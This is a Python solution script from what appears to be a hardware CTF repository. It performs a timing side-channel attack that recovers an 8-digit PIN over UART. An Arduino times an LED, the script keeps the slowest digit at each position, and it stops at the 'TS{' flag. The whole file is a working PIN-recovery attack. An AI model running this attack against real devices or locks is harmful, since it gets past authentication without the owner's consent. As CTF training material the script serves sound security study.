Newer
Older
12Sec_CTF_v1 / docs / 12_solution.py
root 13 days ago 10 KB solution writeups
#!/usr/bin/env python3
"""
=====================================================================
UART Timing Analysis PIN Discovery Script (configurable start)
=====================================================================
Performs timing-based side-channel analysis to discover an 8-digit PIN
via UART, using the Arduino I/O controller for synchronised monitoring.

This variant allows pre-setting a starting code (prefix) and the
starting position index so that discovery may resume part-way through.
Version: 1.3
=====================================================================
"""

import time
import serial
from arduinIO import ArduinoController

# ================================================================
# Configuration
# ================================================================

# --- UART link to the target device ---
SERIAL_PORT = '/dev/ttyUSB0'
BAUD_RATE = 1199          # unusual rate; presumably what the target expects — confirm
UART_NEWLINE = "\n"       # terminator appended to every message sent

# --- Arduino I/O controller that observes the target's LED ---
ARDIO_PORT = "/dev/ttyACM0"
ARDIO_BAUDRATE = 115200
ARDIO_INPUT_PIN = 2       # pin watched for the LOW transition

# --- Search space ---
PIN_LENGTH = 8
KEYSPACE = list("0123456789")   # candidate characters, tried in this order
PAD_CHAR = 'A'                  # fills the positions after the one being guessed
ATTEMPTS_PER_CANDIDATE = 1

# --- Resuming a partial run ---
# START_CODE: already-known prefix of the PIN (may be empty).
# START_POS:  zero-based index of the first position to discover. It must equal
#             len(START_CODE) and lie in 0..PIN_LENGTH; PIN_LENGTH means there
#             is nothing left to discover.
# Example: START_CODE = "253" with START_POS = 3 resumes at the 4th digit.
START_CODE = ""
START_POS = 0

# --- Delays (seconds, unless the name ends in _MS) ---
INTER_ATTEMPT_DELAY = 1.5      # pause between consecutive attempts
SEND_SETTLE_DELAY = 0.5        # pause after sending, before sampling the pin
POSITION_SETTLE_DELAY = 0.05   # pause after a position has been decided
MAX_WAIT_MS = 800              # maximum time to watch the pin for a response (ms)
MAX_UPPER_BOUND_MS = 1000      # initial upper bound for accepted durations (ms)

# ================================================================
# Helper Functions
# ================================================================

def log(msg: str, level: str = "INFO"):
    """Print one log line prefixed with a colour-coded level label.

    Args:
        msg: Text printed after the label.
        level: One of INFO, TEST, ATTEMPT, RESULT, ERROR or SUCCESS. Any other
            value is shown with a plain, uncoloured ``[LOG]`` label.
    """
    labels = dict(
        INFO="\033[94m[INFO]\033[0m",
        TEST="\033[93m[TEST]\033[0m",
        ATTEMPT="\033[90m[ATTEMPT]\033[0m",
        RESULT="\033[92m[RESULT]\033[0m",
        ERROR="\033[91m[ERROR]\033[0m",
        SUCCESS="\033[96m[SUCCESS]\033[0m",
    )
    label = labels[level] if level in labels else "[LOG]"
    print(f"{label} {msg}")


def send_uart_message(ser, message: str):
    """Write *message* to the UART target as UTF-8, then flush the port.

    UART_NEWLINE is appended only when *message* does not already end with
    it, so callers may pass either terminated or unterminated text.
    """
    payload = message if message.endswith(UART_NEWLINE) else message + UART_NEWLINE
    ser.write(payload.encode("utf-8"))
    ser.flush()


def validate_start_settings(start_code=None, start_pos=None, pin_length=None, keyspace=None):
    """Validate the resume prefix and start index for consistency and bounds.

    Each argument falls back to the module-level setting it mirrors
    (START_CODE, START_POS, PIN_LENGTH, KEYSPACE) when omitted. The
    zero-argument call therefore validates the script configuration.

    Args:
        start_code: Known PIN prefix (string, may be empty).
        start_pos: Zero-based index of the first position to discover.
        pin_length: Total PIN length.
        keyspace: Iterable of characters a PIN position may take.

    Raises:
        ValueError: if the code is not a string, the position is not an int,
            the position lies outside 0..pin_length, the prefix length differs
            from the position, or the prefix contains characters not in the
            keyspace.
    """
    if start_code is None:
        start_code = START_CODE
    if start_pos is None:
        start_pos = START_POS
    if pin_length is None:
        pin_length = PIN_LENGTH
    if keyspace is None:
        keyspace = KEYSPACE

    if not isinstance(start_code, str):
        raise ValueError("START_CODE must be a string.")
    # bool is a subclass of int; reject it so True/False aren't taken as positions.
    if not isinstance(start_pos, int) or isinstance(start_pos, bool):
        raise ValueError("START_POS must be an integer.")
    # Range check first so a bad position gets the accurate message. Together
    # with the length check below, this also bounds len(start_code) by
    # pin_length, so no separate length-vs-PIN check is needed.
    if not 0 <= start_pos <= pin_length:
        raise ValueError("START_POS out of valid range.")
    if len(start_code) != start_pos:
        raise ValueError("Length of START_CODE must equal START_POS.")
    # The prefix is sent verbatim as part of every guess, so it must only use
    # characters a PIN position can actually take.
    invalid = sorted(set(start_code) - set(keyspace))
    if invalid:
        raise ValueError(f"START_CODE contains characters outside KEYSPACE: {''.join(invalid)}")


# ================================================================
# PIN Discovery Logic
# ================================================================

def _scan_uart_for_flag(ser):
    """Drain every line already buffered on *ser*; return the first flag line.

    Reads only while ``ser.in_waiting`` reports pending bytes, so it does not
    wait on an empty buffer (``readline`` can still block up to the port's
    read timeout on a partial line). Returns the first stripped line starting
    with ``"TS{"``, or None. Read errors are logged and treated as "nothing
    found" so a flaky serial read never aborts the attack loop.
    """
    flag = None
    try:
        while ser.in_waiting:
            line = ser.readline().decode(errors="ignore").strip()
            if flag is None and line.startswith("TS{"):
                flag = line
    except Exception as exc:  # best effort: keep going, but don't hide the failure
        log(f"UART read failed: {exc}", "ERROR")
    return flag


def _measure_low_delay_ms(arduino, t_start):
    """Return the delay in ms until ARDIO_INPUT_PIN is reported LOW, or 0.

    First asks the Arduino for pin events over a MAX_WAIT_MS window and uses
    the ``duration_ms`` of the first LOW event. If that yields nothing, it
    falls back to a blocking ``wait_for``. When ``wait_for`` does not report a
    duration, it uses host-side elapsed time since *t_start*, which must be a
    ``time.perf_counter()`` timestamp. No UART I/O happens here.
    """
    dur_ms = 0
    try:
        events = arduino.watch_pin(ARDIO_INPUT_PIN, duration_ms=MAX_WAIT_MS)
    except Exception:
        # A failed watch is treated like "no event"; the fallback below retries.
        events = []

    if events:
        low_event = next((ev for ev in events if ev.get("state") == "LOW"), None)
        if low_event:
            # Guard against an explicit None so the range check never sees it.
            dur_ms = low_event.get("duration_ms") or 0

    if dur_ms == 0:
        try:
            result = arduino.wait_for(ARDIO_INPUT_PIN, "LOW")
            elapsed_ms = int((time.perf_counter() - t_start) * 1000)
            if isinstance(result, dict):
                dur_ms = result.get("duration_ms", elapsed_ms)
            else:
                dur_ms = elapsed_ms
        except Exception:
            # 0 falls outside the accepted window, so this attempt is ignored.
            dur_ms = 0
    return dur_ms


def _print_progress(discovered):
    """Print the code recovered so far inside a box sized to fit it."""
    text = f" Progress: {discovered:<{PIN_LENGTH}} "
    bar = "─" * len(text)
    print(f"\n    ┌{bar}┐")
    print(f"    │{text}│")
    print(f"    └{bar}┘\n")


def find_code(ser, arduino, *, min_valid_ms=600, bound_step_ms=20):
    """
    Discover the PIN by measuring time from send until LED (ARDIO_INPUT_PIN) goes LOW.

    For each remaining position, every KEYSPACE character is tried (padded to
    PIN_LENGTH with PAD_CHAR), and the one with the largest average LOW-delay
    is kept.

    No UART reading occurs during the timed interval. UART is only drained
    before sending and right after the measurement completes, so no extra
    delay enters the critical timing path. The pre-send drain still checks
    for a success line: the target may print it late, and it is then
    attributed to the previously sent code instead of being discarded.

    Args:
        ser: Open serial port to the target.
        arduino: Connected ArduinoController watching ARDIO_INPUT_PIN.
        min_valid_ms: Measurements below this (ms) are discarded.
        bound_step_ms: Growth of the upper acceptance bound (ms) per position
            already discovered in this run, added to MAX_UPPER_BOUND_MS.

    Returns:
        The discovered code. It returns early with the sent code as soon as
        the target prints a line starting with "TS{".

    Raises:
        ValueError: if START_CODE / START_POS fail validation.
    """
    validate_start_settings()
    log("Starting PIN discovery (timing with no mid-send UART checks)", "INFO")

    discovered = START_CODE
    start_pos = START_POS

    remaining_positions = PIN_LENGTH - start_pos
    if remaining_positions <= 0:
        log(f"No positions to discover. Current code: {discovered}", "INFO")
        return discovered

    total_attempts = remaining_positions * len(KEYSPACE) * ATTEMPTS_PER_CANDIDATE
    # Monotonic clock: wall-clock adjustments must not distort the ETA.
    eta_start = time.monotonic()
    attempts_done = 0
    # Prefix+candidate of the most recently sent guess, used to attribute a
    # late success line found by the pre-send drain.
    last_sent_code = None

    for pos in range(start_pos, PIN_LENGTH):
        human_pos = pos + 1
        log(f"Analysing position {human_pos}/{PIN_LENGTH}", "INFO")
        timings = {}

        # Upper bound grows with each position identified in this run.
        upper_bound = MAX_UPPER_BOUND_MS + (pos - start_pos) * bound_step_ms

        for candidate in KEYSPACE:
            candidate_code = discovered + candidate
            candidate_pin = candidate_code + PAD_CHAR * (PIN_LENGTH - len(candidate_code))
            durations = []

            for attempt in range(ATTEMPTS_PER_CANDIDATE):
                # Drain stale UART lines before sending, keeping any late flag.
                flag = _scan_uart_for_flag(ser)
                if flag and last_sent_code is not None:
                    log(f"Device accepted code via UART: {flag} -> {last_sent_code}", "SUCCESS")
                    return last_sent_code

                # Clear any previous short event records on the Arduino (best effort).
                try:
                    arduino.watch_pin(ARDIO_INPUT_PIN, duration_ms=1)
                except Exception:
                    pass

                # Critical interval begins: high-resolution monotonic clock.
                t_start = time.perf_counter()
                send_uart_message(ser, candidate_pin + UART_NEWLINE)
                last_sent_code = candidate_code

                # Short settle after send (does not move the measurement start).
                time.sleep(SEND_SETTLE_DELAY)

                dur_ms = _measure_low_delay_ms(arduino, t_start)

                # Immediately after measurement: drain UART and check for success.
                flag = _scan_uart_for_flag(ser)
                if flag:
                    log(f"Device accepted code via UART: {flag} -> {candidate_code}", "SUCCESS")
                    return candidate_code

                # Only include durations that lie within the allowed window.
                if min_valid_ms <= dur_ms <= upper_bound:
                    durations.append(dur_ms)

                # ETA (computed outside the critical interval); attempts_done >= 1 here.
                attempts_done += 1
                elapsed = time.monotonic() - eta_start
                eta_remaining = (total_attempts - attempts_done) * elapsed / attempts_done
                eta_min, eta_sec = divmod(int(eta_remaining), 60)

                # Overwrite the attempt line in place.
                print(f"\r\033[90m[ATTEMPT]\033[0m {candidate} attempt {attempt + 1}/{ATTEMPTS_PER_CANDIDATE} → {dur_ms} ms | ETA: {eta_min}m {eta_sec}s", end='', flush=True)

                time.sleep(INTER_ATTEMPT_DELAY)

            # Average over valid durations only; 0.0 marks "no usable measurement".
            avg_duration = sum(durations) / len(durations) if durations else 0.0
            timings[candidate] = avg_duration
            print(f"\r\033[92m[RESULT]\033[0m Candidate '{candidate}' average LOW-delay: {avg_duration:.2f} ms", flush=True)

        # Select the candidate with the largest average delay.
        if any(v > 0 for v in timings.values()):
            selected = max(timings, key=timings.get)
        else:
            selected = KEYSPACE[0]
            log(f"No valid timings for position {human_pos}; guessing '{selected}'", "ERROR")

        discovered += selected
        log(f"Position {human_pos} selected: '{selected}' (avg {timings.get(selected, 0.0):.2f} ms)", "INFO")

        _print_progress(discovered)

        # Optional settle between positions; keep minimal if timing-sensitive.
        if POSITION_SETTLE_DELAY:
            time.sleep(POSITION_SETTLE_DELAY)

    # The success line for the very last attempt may still be in flight.
    flag = _scan_uart_for_flag(ser)
    if flag and last_sent_code is not None:
        log(f"Device accepted code via UART: {flag} -> {last_sent_code}", "SUCCESS")
        return last_sent_code

    log(f"PIN discovery complete → {discovered}", "SUCCESS")
    return discovered



# ================================================================
# Main Execution
# ================================================================

def main():
    """Connect to both devices, run the PIN discovery, and always clean up.

    The Arduino is connected first. Every later step runs inside a
    ``try``/``finally``: the firmware query, pin setup, opening the UART port
    and the discovery itself. The Arduino is therefore disconnected even when
    setup fails, and the UART port is closed whenever it was opened.
    Interrupts and errors raised during discovery are logged. Errors during
    setup still propagate after cleanup, as before.
    """
    log("Initialising Arduino controller...", "INFO")
    arduino = ArduinoController(port=ARDIO_PORT, baudrate=ARDIO_BAUDRATE)
    arduino.connect()
    try:
        version = arduino.get_version()
        log(f"Connected to Arduino firmware {version}", "INFO")

        arduino.set_mode(ARDIO_INPUT_PIN, "INPUT")
        log(f"Configured Arduino input pin {ARDIO_INPUT_PIN}", "INFO")

        log(f"Connecting to UART target on {SERIAL_PORT} at {BAUD_RATE} baud...", "INFO")
        ser = serial.Serial(SERIAL_PORT, BAUD_RATE, timeout=1)
        log("UART connection established", "INFO")

        try:
            pin = find_code(ser, arduino)
            log(f"Discovered PIN: {pin}", "SUCCESS")
        except KeyboardInterrupt:
            log("Process interrupted by user", "ERROR")
        except Exception as e:
            log(f"Unexpected error: {e}", "ERROR")
        finally:
            ser.close()
    finally:
        # Runs even if ser.close() raised, so the Arduino is never leaked.
        arduino.disconnect()
        log("Connections closed", "INFO")


if __name__ == "__main__":
    # Run the attack only when executed as a script, not when imported.
    main()